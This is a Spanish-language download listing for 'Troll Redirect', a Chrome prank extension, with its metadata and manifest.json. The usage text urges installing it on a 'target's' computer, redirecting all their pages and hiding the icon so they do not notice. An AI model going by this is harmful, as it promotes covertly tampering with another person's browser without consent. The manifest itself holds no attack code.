Troll Redirect

Redirect all of your friend's webpages automatically by installing this on their computer!

¿Qué es Troll Redirect?

Troll Redirect es una extensión de Chrome desarrollada por Aaron Lockhart, y su función principal es "Redirect all of your friend's webpages automatically by installing this on their computer!".

Capturas de Pantalla de la Extensión

screenshot

Descargar Archivo CRX de la Extensión Troll Redirect

Descarga archivos de extensión Troll Redirect en formato crx, instala manualmente las extensiones de Chrome en el navegador o comparte los archivos crx con amigos para instalar fácilmente las extensiones de Chrome.

Instrucciones de Uso de la Extensión

                        Troll and prank your friends with this automatically redirecting app! Upon installing it on your target's computer, click the icon and specify the website to which all requests will be redirected. This is guaranteed to frustrate and annoy your target immensely. Then hide the icon in the chrome menu and sit back while your target gets increasingly angry.                    

Información Básica de la Extensión

Nombre Troll Redirect Troll Redirect
ID micldaecbnddhhcaojamonojfdffegph
URL Oficial https://chrome.google.com/webstore/detail/troll-redirect/micldaecbnddhhcaojamonojfdffegph
Descripción Redirect all of your friend's webpages automatically by installing this on their computer!
Tamaño del Archivo 949 KB
Cantidad de Instalaciones 192
Versión Actual 1.0
Última Actualización 2018-12-06
Fecha de Publicación 2018-12-02
Calificación 4.75/5 Total de 4 Calificaciones
Desarrollador Aaron Lockhart
Correo electrónico [email protected]
Tipo de Pago free
Idiomas Soportados en
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "name": "Troll Redirect",
    "version": "1.0",
    "description": "Redirect all of your friend's webpages automatically by installing this on their computer!",
    "manifest_version": 2,
    "author": "Aaron Lockhart",
    "permissions": [
        "tabs",
        "storage"
    ],
    "content_scripts": [
        {
            "matches": [
                "*:\/\/*\/*"
            ],
            "js": [
                "\/src\/troll.js"
            ],
            "run_at": "document_end"
        }
    ],
    "browser_action": {
        "default_popup": "\/src\/popup.html"
    }
}